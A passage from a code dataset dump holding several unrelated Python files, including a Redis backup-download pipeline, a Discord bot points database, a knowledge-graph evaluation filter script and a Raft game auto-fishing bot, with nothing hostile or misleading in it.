kwargs=asdict(download_kwargs),\n )\n\n # cache类型的情况,只有全备份文件,ssd和tendisplus 必须有binlog文件\n if param[\"tendis_type\"] in [ClusterType.TendisplusInstance.value, ClusterType.TendisSSDInstance.value]:\n\n if len(param[\"binlog_file_list\"]) == 0:\n raise TendisGetBinlogFailedException(\n message=_(\"集群类型为:{},但是下载的binlog备份信息为0,不符合预期,最少有2个binlog\".format(param[\"tendis_type\"]))\n )\n # binlog文件下载\n task_ids = [file_info[\"task_id\"] for file_info in param[\"binlog_file_list\"]]\n download_kwargs = DownloadBackupFileKwargs(\n bk_cloud_id=cluster_info[\"bk_cloud_id\"],\n task_ids=task_ids,\n dest_ip=param[\"new_temp_ip\"],\n dest_dir=param[\"dest_dir\"],\n reason=\"redis data structure binlog backup file download\",\n )\n sub_pipeline.add_act(\n act_name=_(\"下载{}binlog文件到{}\").format(param[\"source_ip\"], param[\"new_temp_ip\"]),\n act_component_code=RedisDownloadBackupfileComponent.code,\n kwargs=asdict(download_kwargs),\n )\n\n return sub_pipeline.build_sub_process(sub_name=_(\"下载备份文件到{}\".format(param[\"new_temp_ip\"])))\n","repo_name":"TencentBlueKing/blueking-dbm","sub_path":"dbm-ui/backend/flow/engine/bamboo/scene/redis/redis_data_structure_sub.py","file_name":"redis_data_structure_sub.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"27"} +{"seq_id":"22146883516","text":"import tensorflow.compat.v2 as tf\n\ntf.enable_v2_behavior()\n\n\ndef trapezoid(integral, x_start, x_stop, dx):\n \"\"\"\n Integrate function using trapezoid rule as Tensorflow's odeint() is much slower\n\n Args:\n integral (function): Function that takes 'x' as argument and returns y\n x_start (tensor): Rank-0 tensor of x value to start at\n x_stop( tensor): Rank-0 tensor of x value to stop at\n dx (tensor): Rank-0 tensor of # of trapezoids\n\n Return:\n tensor: Rank-0 tensor of integrated value. Has the the same dtype as integral() returns\n \"\"\"\n # Generate points to integrate\n steps = tf.cast((x_stop - x_start) / dx, dtype=tf.int32)\n x = tf.linspace(x_start, x_stop, steps + 1)\n\n # Get tensor of y values for our x points\n y = integral(x)\n\n # Make tensors of the start and end y values for our trapezoids\n # So if y=[10.0, 25.0, 45.0, 20.0]\n y_start = y[:-1] # ... [10.0, 25.0, 45.0]\n y_stop = y[1:] # ... 
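For readers without Chinese, the strings in the Redis flow record above translate roughly as follows: the docstring says "pull remote Redis backup files for the specified time, for later data reconstruction" (with root_id the flow's root id, ticket_data the associated ticket object, and cluster_info the associated cluster object); the act names read "download full-backup files from {source_ip} to {new_temp_ip}" and "download binlog files from {source_ip} to {new_temp_ip}"; and the exception message says "cluster type is {type}, but 0 binlog backups were downloaded, which is unexpected; at least 2 binlogs are required". Structurally, full backups are always fetched, while binlogs are demanded only for TendisSSD/Tendisplus clusters, since cache-type clusters carry full backups only.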
[25.0, 45.0, 20.0]\n\n # Make a tensor of our trapezoid areas\n y_combined = tf.math.add(y_start, y_stop)\n trapezoids = (y_combined / tf.constant(2.0, dtype=y_combined.dtype)) * tf.cast(dx, dtype=y_combined.dtype)\n\n # Add the trapezoids together\n return tf.reduce_sum(trapezoids)\n","repo_name":"lejambon/b-decay-unbinned-machine-fit","sub_path":"b_meson_fit/integrate.py","file_name":"integrate.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11440234288","text":"from .models import Session, User, Log\nfrom datetime import datetime, timedelta\nimport uuid\n\n\nclass BaseDB:\n def __init__(self):\n self.db = Session().get_db()\n self.now_time = datetime.utcnow()\n self.now_timestamp = datetime.utcnow().timestamp()\n\n\nclass UserDB(BaseDB):\n def __init__(self, ctx):\n super().__init__()\n self.ctx = ctx\n self.check_in_fraction = 5 # TODO: check-in reward amount\n self.user = None\n\n async def get_user(self, user_id):\n user = self.db.query(User).filter(User.id == user_id).first()\n return user if user else None\n\n async def get_users(self):\n return self.db.query(User).all()\n\n async def get_user_fractions(self, user_id):\n user = await self.get_user(user_id)\n if user is None:\n return 0\n return user.fraction\n\n async def get_leader_board(self, old=False):\n users = await self.get_users()\n data = sorted(users, key=lambda user: user.old_fraction if old else user.fraction, reverse=True)\n return data\n\n async def create_user(self, user_id, user_name, old_fraction, fraction):\n user = User(id=user_id, name=user_name, old_fraction=old_fraction,\n fraction=fraction, update_time=self.now_time)\n self.db.add(user)\n self.db.commit()\n return user\n\n async def check_user_in_db(self, user_id, user_name, fraction=0):\n user = await self.get_user(user_id)\n if user is None:\n fraction = 0 if fraction < 0 else fraction\n return await self.create_user(user_id, user_name, 0, fraction)\n return user\n\n async def update_user_fraction(self, user, fraction):\n self.user = user\n user_name = f\"{self.user.name}#{self.user.discriminator}\"\n user = await self.check_user_in_db(self.user.id, user_name, fraction)\n if user is None:\n return False\n\n user.fraction += fraction\n user.fraction = 0 if user.fraction < 0 else user.fraction\n\n user.name = user_name\n user.update_time = self.now_time\n self.db.commit()\n return user\n\n async def update_user_sign_in(self, user):\n self.user = user\n user_name = f\"{self.user.name}#{self.user.discriminator}\"\n user = await self.check_user_in_db(self.user.id, user_name)\n yesterday = self.now_time.date() - timedelta(days=1)\n\n if user is None:\n return 'Unknown error occurred, failed to create user.', 0, \"Null\"\n if user.last_sign_in is not None and user.last_sign_in.date() == self.now_time.date():\n return 'You have already checked in today.', 0, user.fraction\n if user.last_sign_in is None or user.last_sign_in.date() != yesterday:\n user.consecutive_sign_in = 1\n else:\n user.consecutive_sign_in += 1\n user.fraction += self.check_in_fraction\n user.last_sign_in = self.now_time\n self.db.commit()\n await LogDB().add_log(self.user.id, event='Check-in') # TODO: log the check-in event\n return f'Daily check-in completed.', self.check_in_fraction, user.fraction\n\n async def settle_accounts(self, days, award):\n users = await self.get_users()\n\n for user in users:\n if user.consecutive_sign_in >= days: # TODO: 
award bonus points when the consecutive check-in streak reaches the configured number of days\n user.fraction += award\n\n user.old_fraction = user.fraction # TODO: move the current score into old_fraction for the leaderboard\n user.fraction = 0 # TODO: reset the score to zero after settlement\n user.consecutive_sign_in = 0 # TODO: reset the consecutive check-in counter\n\n self.db.commit()\n return True\n\n\nclass LogDB(BaseDB):\n def __init__(self):\n super().__init__()\n\n async def add_log(self, user_id, event):\n log = Log(id=uuid.uuid4(), event_time=self.now_time, user_id=user_id, event=event)\n self.db.add(log)\n self.db.commit()\n return log\n\n async def get_logs(self, user_id, event=None):\n logs = self.db.query(Log).filter(Log.user_id == user_id).all()\n if event and logs:\n logs = [log for log in logs if log.event == event]\n return logs if logs else None\n","repo_name":"linty1997/discord-AngelaMatr1x-bot","sub_path":"core/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25686826855","text":"from re import finditer, search\nfrom typing import List\nfrom templateframework.metadata import Metadata\nfrom random import randint\n\nCHARACTER_QUERY_PARAM = '?'\nREGEX_GET_PARAMETERS_OF_URI = r'\\{(?P<parameter>[a-zA-Z]*(-[a-zA-Z]+)*?)\\}'\n\n\ndef run(metadata: Metadata = None):\n inputs_local = metadata.inputs\n inputs_computed = metadata.computed_inputs\n\n uri = inputs_local['uri']\n method = inputs_computed['method_sanitized']\n resource_request = inputs_computed['resource_request']\n resource_folder_name = inputs_computed['resource_folder_name']\n resource_response = inputs_computed['resource_response']\n \n uri_sanitized = __get_uri_sanitized(uri)\n uri_sanitized_for_test = __generate_uri_sanitized_for_test(uri)\n uri_sanitized_without_query_parms = __get_uri_without_query_parms(uri_sanitized)\n uri_contain_resource_id = __uri_contain_resource_id(uri)\n should_response_as_list = __should_response_as_list(uri_contain_resource_id, method)\n contain_resource_parameter = __should_contain_resource_parameter(method)\n should_response_data = __should_response_data(method)\n\n metadata.computed_inputs['parameters'] = __get_parameters(uri, resource_request, resource_folder_name, contain_resource_parameter)\n metadata.computed_inputs['uri_contain_resource_id'] = uri_contain_resource_id\n metadata.computed_inputs['should_response_as_list'] = should_response_as_list\n metadata.computed_inputs['contain_resource_parameter'] = contain_resource_parameter\n metadata.computed_inputs['should_response_data'] = should_response_data\n metadata.computed_inputs['uri_sanitized'] = uri_sanitized\n metadata.computed_inputs['uri_sanitized_for_test'] = uri_sanitized_for_test\n metadata.computed_inputs['uri_sanitized_without_query_parms'] = uri_sanitized_without_query_parms\n metadata.computed_inputs['resource_response_full_sanitized'] = f'List[{resource_response}]' if should_response_as_list else resource_response\n\n return metadata\n\n\ndef __get_parameters(\n uri,\n resource_request,\n resource_folder_name,\n contain_resource_parameter) -> List[tuple]:\n uri_params_groups = finditer(r'\\{(?P<parameter>([a-z]+(-[a-z]*)+)|[a-z]+)\\}', uri)\n parameters = []\n\n if uri_params_groups:\n for uri_param_group in uri_params_groups:\n parameter = uri_param_group.group('parameter')\n\n if __is_query_parameter(uri, parameter):\n parameter = __get_query_parameter_name_of_value(uri, parameter)\n\n parameter = parameter.replace('-', '_')\n\n parameters.append((parameter, 'str'))\n\n if contain_resource_parameter:\n parameters.append((resource_folder_name, resource_request))\n\n return 
parameters\n\n\ndef __is_query_parameter(uri, parameter_value):\n try:\n index_character_query_param = __get_query_param_index(uri)\n index_of_parameter = uri.index(f'{{{parameter_value}}}')\n return index_of_parameter > index_character_query_param\n except ValueError:\n return False\n\n\ndef __get_query_parameter_name_of_value(uri, parameter_value):\n index_character_query_param = __get_query_param_index(uri)\n uri_query_parameters = uri[index_character_query_param+1:]\n parameters = uri_query_parameters.split('&')\n parameter_value_with_braces = f'={{{parameter_value}}}'\n for parameter in parameters:\n if parameter_value in parameter:\n return parameter.replace(parameter_value_with_braces, '')\n return ''\n\n\ndef __get_uri_sanitized(uri: str) -> str:\n ocurrences = finditer(REGEX_GET_PARAMETERS_OF_URI, uri)\n for ocurrence in ocurrences:\n parameter_not_sanitized = ocurrence.group('parameter')\n parameter_sanitized = parameter_not_sanitized.replace('-', '_')\n uri = uri.replace(parameter_not_sanitized, parameter_sanitized)\n \n uri = uri.replace('amp;', '')\n\n return uri\n\ndef __generate_uri_sanitized_for_test(uri: str) -> str:\n ocurrences = finditer(REGEX_GET_PARAMETERS_OF_URI, uri)\n for ocurrence in ocurrences:\n parameter_not_sanitized = ocurrence.group('parameter')\n number_replacement = randint(1, 200)\n uri = uri.replace(f'{{{parameter_not_sanitized}}}', str(number_replacement))\n\n return uri\n \ndef __should_response_as_list(\n uri_contain_resource_id: bool,\n method: str) -> bool:\n return not uri_contain_resource_id and method == 'get'\n\n\ndef __should_contain_resource_parameter(method: str) -> bool:\n return method in ['post', 'put', 'patch']\n\n\ndef __should_response_data(method: str) -> bool:\n return method != 'delete'\n\n\ndef __get_uri_without_query_parms(uri) -> str:\n return uri[:__get_query_param_index(uri)] if __contain_query_params(uri) else uri\n\n\ndef __contain_query_params(uri) -> bool:\n return uri.find(CHARACTER_QUERY_PARAM) != -1\n\n\ndef __get_query_param_index(uri) -> int:\n return uri.index(CHARACTER_QUERY_PARAM)\n\n\ndef __uri_contain_resource_id(uri):\n uri_without_query_params = __get_uri_without_query_parms(uri)\n\n return search(r'(?P<resource_id>\\/{[a-zA-Z]*(-[a-zA-Z]*)*}$)', uri_without_query_params) is not None\n\n","repo_name":"stack-spot/stackspot-python-stack","sub_path":"lambda-endpoint-create-plugin/scripts/extract_data_from_inputs.py","file_name":"extract_data_from_inputs.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"41857858700","text":"# -*- coding: utf-8\nfrom __future__ import unicode_literals, absolute_import\n\nimport django\n\nDEBUG = True\nUSE_TZ = True\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = \"f(xj&4v)k!4qtr2@^h4_yz-p5uvo(k(-9r%k_8xwwy=3t0u=@$\"\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \":memory:\",\n }\n}\n\nROOT_URLCONF = \"tests.urls\"\n\nINSTALLED_APPS = [\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sites\",\n \"django_rest_framework_choices\",\n]\n\nSITE_ID = 1\n\nif django.VERSION >= (1, 10):\n MIDDLEWARE = ()\nelse:\n MIDDLEWARE_CLASSES = ()\n","repo_name":"An4ik/django-rest-framework-choices","sub_path":"tests/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
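The extract_data_from_inputs.py record above decides whether each {param} placeholder is a path or a query parameter by comparing character indices around the '?' separator. For readers who want to poke at that logic in isolation, here is a minimal, self-contained sketch of the same idea; the function name classify_placeholders, the simplified regex, and the sample URI are illustrative assumptions, not part of the original plugin.

import re

# Hypothetical reduction of the placeholder classification: split the URI at
# '?' once and report which {param} names occur in the path and in the query.
PARAM_RE = re.compile(r'\{(?P<parameter>[a-zA-Z]+(?:-[a-zA-Z]+)*)\}')

def classify_placeholders(uri: str):
    """Return ([path parameters], [query parameters]) found in a templated URI."""
    head, _, tail = uri.partition('?')
    path_params = [m.group('parameter') for m in PARAM_RE.finditer(head)]
    query_params = [m.group('parameter') for m in PARAM_RE.finditer(tail)]
    return path_params, query_params

assert classify_placeholders('/users/{user-id}/posts?tag={tag-name}') == (['user-id'], ['tag-name'])

Splitting once with str.partition avoids the repeated uri.index scans (and the try/except around them) that the original helpers perform for every parameter.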
+{"seq_id":"16110235870","text":"import win32gui\nimport win32ui\nfrom ctypes import windll\nfrom PIL import Image\nfrom PIL import ImageChops\nimport pyvda\nimport pyautogui\nimport time\nimport win32api\nimport win32con\nfrom cv2 import cv2\nimport numpy\n\nWND_TITLE = 'Raft'\nPATTERN_PATH = 'pattern.png'\n\ndef send_mouse_click(hwnd, mouse_pos, delay):\n mouse_pos = win32api.MAKELONG(mouse_pos[0], mouse_pos[1])\n win32gui.SendMessage(hwnd, win32con.WM_LBUTTONDOWN, win32con.MK_LBUTTON, mouse_pos)\n time.sleep(delay)\n win32gui.SendMessage(hwnd, win32con.WM_LBUTTONUP, 0, mouse_pos) \n\npattern = Image.open(PATTERN_PATH).convert('RGB')\nopen_cv_pattern = cv2.cvtColor(numpy.array(pattern), cv2.COLOR_RGB2BGR)\n\nhwnd = win32gui.FindWindow(None, WND_TITLE)\n\nwhile True:\n left, top, right, bot = win32gui.GetWindowRect(hwnd)\n w = right - left\n h = bot - top\n\n hwndDC = win32gui.GetWindowDC(hwnd)\n mfcDC = win32ui.CreateDCFromHandle(hwndDC)\n saveDC = mfcDC.CreateCompatibleDC()\n\n saveBitMap = win32ui.CreateBitmap()\n saveBitMap.CreateCompatibleBitmap(mfcDC, w, h)\n\n saveDC.SelectObject(saveBitMap)\n\n result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 0)\n\n bmpinfo = saveBitMap.GetInfo()\n bmpstr = saveBitMap.GetBitmapBits(True)\n\n im = Image.frombuffer(\n 'RGB',\n (bmpinfo['bmWidth'], bmpinfo['bmHeight']),\n bmpstr, 'raw', 'BGRX', 0, 1)\n\n win32gui.DeleteObject(saveBitMap.GetHandle())\n saveDC.DeleteDC()\n mfcDC.DeleteDC()\n win32gui.ReleaseDC(hwnd, hwndDC)\n\n if result == 1:\n open_cv_im = cv2.cvtColor(numpy.array(im), cv2.COLOR_RGB2BGR)\n result = cv2.matchTemplate(open_cv_pattern, open_cv_im, cv2.TM_CCOEFF_NORMED)\n \n threshold = .95\n loc = numpy.where(result >= threshold)\n found_x, found_y = loc[1], loc[0]\n \n #OLD CODE\n #selected_area = im.crop((FROM_PIXEL[0], FROM_PIXEL[1], TO_PIXEL[0], TO_PIXEL[1])).convert('RGB')\n #diff = ImageChops.difference(pattern, selected_area)\n #if #not diff.getbbox():\n\n if len(found_x) > 0 and len(found_y) > 0: \n is_valid_x = False\n is_valid_y = False\n\n for x in found_x:\n if abs(x - w/2) < 100:\n is_valid_x = True\n\n for y in found_y:\n if abs(y - h/2) < 100:\n is_valid_y = True\n\n if is_valid_x and is_valid_y:\n #OLD CODE\n #prev_desk = pyvda.GetCurrentDesktopNumber()\n #pyvda.GoToDesktopNumber(2)\n #win32gui.SetForegroundWindow(hwnd)\n #pyautogui.click(left + 1, top + 1)\n #pyautogui.mouseDown()\n #time.sleep(0.1) \n #pyautogui.mouseUp()\n #pyvda.GoToDesktopNumber(prev_desk) \n\n mouse_pos = (left + 1, top + 1)\n\n send_mouse_click(hwnd, mouse_pos, 0.1)\n time.sleep(0.1)\n send_mouse_click(hwnd, mouse_pos, 1) \n\n print('Catched!')\n\n time.sleep(0.2)","repo_name":"sh1nes-1/RaftBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74376207431","text":"from pathlib import Path\nfrom typing import Union\nimport sys\n\nimport logging\n\nformatter = logging.Formatter('%(asctime)s - %(levelname)8s: %(message)s', \"%H:%M:%S\")\nfile_formatter = logging.Formatter('%(asctime)s %(levelname)8s - %(module)10s %(funcName)15s : %(message)s',\n \"%H:%M:%S\")\n\n\nclass LogClass:\n \"\"\"\n Main class to log information to stdout and ASCII logfile.\n\n Note: Logging level is set to DEBUG for file and INFO for stdout\n\n To use:\n ``log = LogClass(logfile).get_logger()``\n\n :param logfile: Filename for log file\n \"\"\"\n\n def __init__(self, logfile: Union[str, Path]):\n self.LOG_FILENAME = 
logfile\n\n def get_logger(self) -> logging.Logger:\n file_log_level = logging.DEBUG # This is for file logging\n log = logging.getLogger(\"main_logger\")\n if not log.handlers:\n log.setLevel(file_log_level)\n\n sh = logging.StreamHandler(sys.stdout)\n sh.setLevel(logging.INFO) # Only at INFO level\n sh.setFormatter(formatter)\n log.addHandler(sh)\n\n fh = logging.FileHandler(self.LOG_FILENAME)\n fh.setLevel(file_log_level)\n fh.setFormatter(file_formatter)\n log.addHandler(fh)\n\n log.handler_set = True\n log.propagate = False\n return log\n\n\ndef log_stdout() -> logging.Logger:\n \"\"\"Stdout logging\"\"\"\n\n log_level = logging.INFO\n log = logging.getLogger(\"stdout_logger\")\n if not log.handlers:\n log.setLevel(log_level)\n sh = logging.StreamHandler(sys.stdout)\n sh.setFormatter(formatter)\n log.addHandler(sh)\n\n log.handler_set = True\n log.propagate = False\n return log\n","repo_name":"astrochun/academic-ads-bibtex","sub_path":"academic_ads_bibtex/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"5041200600","text":"import numpy as np\nimport pandas as pd\n\ndata = pd.read_csv(\"Data/churn_train_data.csv\", sep=\"\\t\")\nprint(''.join(data['launch_seq'][0].lstrip('[').rstrip(']').split(',')))\nprint(list(map(int, data['launch_seq'][0].lstrip('[').rstrip(']').split(','))))\n\ntemp_array = np.zeros((600001, 32))\nfor i, item in enumerate(data['launch_seq']):\n # temp_array[i] = list(map(int, item.lstrip('[').rstrip(']').split(',')))\n temp_array[i] = item.lstrip('[').rstrip(']').split(',')\nprint(temp_array.dtype)\nprint(temp_array.shape)\ncols = ['launch_seq'+str(i) for i in range(1, 33)]\ntrain = pd.DataFrame(temp_array, columns=cols)\ntrain = pd.concat([data, train], axis=1)\nprint(train)\n\ntemp_array1 = np.zeros((600001, 32))\nfor i, item in enumerate(data['playtime_seq']):\n # temp_array[i] = list(map(int, item.lstrip('[').rstrip(']').split(',')))\n temp_array1[i] = item.lstrip('[').rstrip(']').split(',')\nprint(temp_array1.dtype)\nprint(temp_array1.shape)\ncols = ['playtime_seq'+str(i) for i in range(1, 33)]\ntrain1 = pd.DataFrame(temp_array1, columns=cols)\ntrain = pd.concat([train, train1], axis=1)\nprint(train)\n\ntemp_array2 = np.zeros((600001, 16))\nfor i, item in enumerate(data['duration_prefer']):\n temp_array2[i] = item.lstrip('[').rstrip(']').split(',')\nprint(temp_array2.dtype)\nprint(temp_array2.shape)\ncols = ['duration_prefer'+str(i) for i in range(1, 17)]\ntrain2 = pd.DataFrame(temp_array2, columns=cols)\ntrain = pd.concat([train, train2], axis=1)\nprint(train)\n\ntemp_array3 = np.zeros((600001, 11))\nfor i, item in enumerate(data['interact_prefer']):\n # temp_array[i] = list(map(int, item.lstrip('[').rstrip(']').split(',')))\n temp_array3[i] = item.lstrip('[').rstrip(']').split(',')\nprint(temp_array3.dtype)\nprint(temp_array3.shape)\ncols = ['interact_prefer'+str(i) for i in range(1, 12)]\ntrain3 = pd.DataFrame(temp_array3, columns=cols)\ntrain = pd.concat([train, train3], axis=1)\nprint(train)\ntrain = train.drop(columns=['launch_seq', 'playtime_seq', 'duration_prefer', 'interact_prefer'])\nprint(train)\ntrain.to_csv('Data/churn_data_nosqe.csv', index=False)\n","repo_name":"farmer169/BS-DNN","sub_path":"sequence2single.py","file_name":"sequence2single.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} 
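The sequence2single.py record above expands stringified sequence columns such as '[0, 1, 2, ...]' into one column per position by looping row-by-row into preallocated numpy arrays. The same transformation can be written with pandas string methods; the sketch below is a hypothetical variant (the helper name and the toy two-row frame are illustrative, and the column count is derived from the data rather than hard-coded to 32 as in the original script).

import pandas as pd

def expand_seq_column(df: pd.DataFrame, col: str) -> pd.DataFrame:
    """Split a column of '[v1, v2, ...]' strings into one numeric column per slot."""
    # Strip the brackets, split on commas, and let pandas allocate the columns.
    seq = df[col].str.strip('[]').str.split(',', expand=True).astype(float)
    seq.columns = [f'{col}{i}' for i in range(1, seq.shape[1] + 1)]
    return pd.concat([df.drop(columns=[col]), seq], axis=1)

print(expand_seq_column(pd.DataFrame({'launch_seq': ['[1, 0, 2]', '[0, 0, 1]']}), 'launch_seq'))

Deriving the width from seq.shape[1] also removes the need to know the sequence length (or the row count) up front.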
+{"seq_id":"13308576555","text":"\"\"\"\nFiltering:\n------------------------------------------\n- For all val/train triples (s, p, o):\n - List all o' such that (s, p, o') is in train/val/test set\n - List all s' such that (s', p, o) is in train/val/test set\n\n- Return 2 x (M_val or M_test) x (list of variable lengths)\n\nDuring evaluation:\n------------------------------------------\n- Use these lists for indexing the prediction result and set them to -inf\n so that they will not ranked first.\n\"\"\"\nimport numpy as np\nimport tqdm\nimport argparse\nimport os\n\n\nparser = argparse.ArgumentParser(\n description='Create evaluation filters for YAGO'\n)\n\nparser.add_argument('--load', default=False, action='store_true',\n help='load temp data or not (default: False)')\nparser.add_argument('--dataset', default='yago', metavar='',\n help='which dataset in {`yago`, `fb15k`} to be used? (default: yago)')\n\nargs = parser.parse_args()\n\n\nif args.dataset == 'yago':\n dataset_dir = 'yago3-10-literal'\nelse:\n dataset_dir = 'fb15k-literal'\n\nif not os.path.exists('data/{}/bin/temp/'.format(dataset_dir)):\n os.makedirs('data/{}/bin/temp/'.format(dataset_dir))\n\n\n# Load dict\nidx2ent = np.load('data/{}/bin/idx2ent.npy'.format(dataset_dir))\nn_ent = len(idx2ent)\n\n# Load all datasets\nX_train = np.load('data/{}/bin/train.npy'.format(dataset_dir))\nX_val = np.load('data/{}/bin/val.npy'.format(dataset_dir))\nX_test = np.load('data/{}/bin/test.npy'.format(dataset_dir))\n\ncnt = 1\nM_val = X_val.shape[0]\n\nif args.load:\n idx_s_prime_train = np.load('data/{}/bin/temp/idx_s_prime_train.npy'.format(dataset_dir))\n idx_o_prime_train = np.load('data/{}/bin/temp/idx_o_prime_train.npy'.format(dataset_dir))\n idx_s_prime_val = np.load('data/{}/bin/temp/idx_s_prime_val.npy'.format(dataset_dir))\n idx_o_prime_val = np.load('data/{}/bin/temp/idx_o_prime_val.npy'.format(dataset_dir))\n idx_s_prime_test = np.load('data/{}/bin/temp/idx_s_prime_test.npy'.format(dataset_dir))\n idx_o_prime_test = np.load('data/{}/bin/temp/idx_o_prime_test.npy'.format(dataset_dir))\nelse:\n idx_s_prime_train, idx_o_prime_train = [], []\n idx_s_prime_val, idx_o_prime_val = [], []\n idx_s_prime_test, idx_o_prime_test = [], []\n\n print('Gathering all entity in s and o of all datasets')\n print('-----------------------------------------------')\n\n for e_prime in tqdm.tqdm(range(n_ent)):\n # Train\n idx_s = set(np.where(X_train[:, 0] == e_prime)[0])\n idx_s_prime_train.append(idx_s)\n\n idx_o = set(np.where(X_train[:, 2] == e_prime)[0])\n idx_o_prime_train.append(idx_o)\n\n # Val\n idx_s = set(np.where(X_val[:, 0] == e_prime)[0])\n idx_s_prime_val.append(idx_s)\n\n idx_o = set(np.where(X_val[:, 2] == e_prime)[0])\n idx_o_prime_val.append(idx_o)\n\n # Test\n idx_s = set(np.where(X_test[:, 0] == e_prime)[0])\n idx_s_prime_test.append(idx_s)\n\n idx_o = set(np.where(X_test[:, 2] == e_prime)[0])\n idx_o_prime_test.append(idx_o)\n\n np.save('data/{}/bin/temp/idx_s_prime_train.npy'.format(dataset_dir), idx_s_prime_train)\n np.save('data/{}/bin/temp/idx_o_prime_train.npy'.format(dataset_dir), idx_o_prime_train)\n np.save('data/{}/bin/temp/idx_s_prime_val.npy'.format(dataset_dir), idx_s_prime_val)\n np.save('data/{}/bin/temp/idx_o_prime_val.npy'.format(dataset_dir), idx_o_prime_val)\n np.save('data/{}/bin/temp/idx_s_prime_test.npy'.format(dataset_dir), idx_s_prime_test)\n np.save('data/{}/bin/temp/idx_o_prime_test.npy'.format(dataset_dir), idx_o_prime_test)\n\n print('Done and saved!')\n print()\n\n\ndatasets = ['val', 'test']\n\nfor 
dataset in datasets:\n print('Begin filtering {} set'.format(dataset))\n print('------------------------------')\n\n filters_s = []\n filters_o = []\n\n X = X_val if dataset == 'val' else X_test\n\n for s, p, o in tqdm.tqdm(X):\n idx_p_train = set(np.where(X_train[:, 1] == p)[0])\n idx_p_val = set(np.where(X_val[:, 1] == p)[0])\n idx_p_test = set(np.where(X_test[:, 1] == p)[0])\n\n idx_sp_train = idx_s_prime_train[s] & idx_p_train\n idx_po_train = idx_p_train & idx_o_prime_train[o]\n idx_sp_val = idx_s_prime_val[s] & idx_p_val\n idx_po_val = idx_p_val & idx_o_prime_val[o]\n idx_sp_test = idx_s_prime_test[s] & idx_p_test\n idx_po_test = idx_p_test & idx_o_prime_test[o]\n\n \"\"\"\n Step:\n -----\n Given (s, p, o')\n 1. Check if it come up in X_train, X_val, and X_test\n 2. If one of them are true then add o'\n Repeat for (s', p, o)\n \"\"\"\n\n s_ents = []\n o_ents = []\n\n for e_prime in range(n_ent):\n # subjects\n idx_spo_train = idx_s_prime_train[e_prime] & idx_po_train\n idx_spo_val = idx_s_prime_val[e_prime] & idx_po_val\n idx_spo_test = idx_s_prime_test[e_prime] & idx_po_test\n\n if len(idx_spo_train | idx_spo_val | idx_spo_test):\n s_ents.append(e_prime)\n\n # objects\n idx_spo_train = idx_sp_train & idx_o_prime_train[e_prime]\n idx_spo_val = idx_sp_val & idx_o_prime_val[e_prime]\n idx_spo_test = idx_sp_test & idx_o_prime_test[e_prime]\n\n if len(idx_spo_train | idx_spo_val | idx_spo_test):\n o_ents.append(e_prime)\n\n # Contains subject/object entities to be ignored for this validation tripl\n filters_s.append(s_ents)\n filters_o.append(o_ents)\n\n # Save filters\n np.save('data/{}/bin/filter_s_{}.npy'.format(dataset_dir, dataset), filters_s)\n np.save('data/{}/bin/filter_o_{}.npy'.format(dataset_dir, dataset), filters_o)\n\n print('Done!')\n print()\n\nprint('All done and saved!')\n","repo_name":"nilesh-c/KGE-Literals-copy","sub_path":"data_preparation/create_evaluation_filter.py","file_name":"create_evaluation_filter.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"73043577353","text":"import pandas as pd\r\nimport numpy as np\r\nfrom datetime import date, datetime\r\nimport plotly.express as px\r\nimport streamlit as st\r\n\r\nclass PriceTimeSeries:\r\n\r\n TODAY = np.datetime64(date.today())\r\n FULL_CALENDAR = pd.DataFrame(pd.date_range(start=\"2023-01-01\", end=TODAY), columns=['datetime'])\r\n REGIONI = (\r\n 'Abruzzo', 'Basilicata', 'Calabria', 'Campania', 'Emilia-Romagna',\r\n 'Friuli-Venezia Giulia', 'Lazio', 'Liguria', 'Lombardia', 'Marche',\r\n 'Molise', 'Piemonte', 'Puglia', 'Sardegna', 'Sicilia', 'Toscana',\r\n 'Veneto', 'Valle-D-Aosta', 'Trentino-Alto-Adige'\r\n )\r\n\r\n def __init__(self,\r\n df_path=\"dataframes/italy_housing_price_rent_clean.parquet.gzip\"):\r\n self.df_path = df_path\r\n\r\n def load_data(self):\r\n return pd.read_parquet(self.df_path)\r\n\r\n def clean_datetime(self, df):\r\n df = df.loc[(df['datetime'] > '2023-01-01') & (df['datetime'] < self.TODAY)]\r\n df = pd.merge(df, self.FULL_CALENDAR, how='outer', on='datetime')\r\n return df\r\n\r\n def select_time_range(self, df, time_start, time_end):\r\n df = df.loc[(df['datetime'] >= time_start) & (df['datetime'] <= time_end)]\r\n return df\r\n\r\n def get_week_and_month(self, df):\r\n df['week'] = df['datetime'].dt.to_period('W').dt.start_time\r\n df['month'] = df['datetime'].dt.to_period('M').dt.start_time\r\n return df\r\n\r\n def sidebar_select_time_range(self):\r\n today_string = 
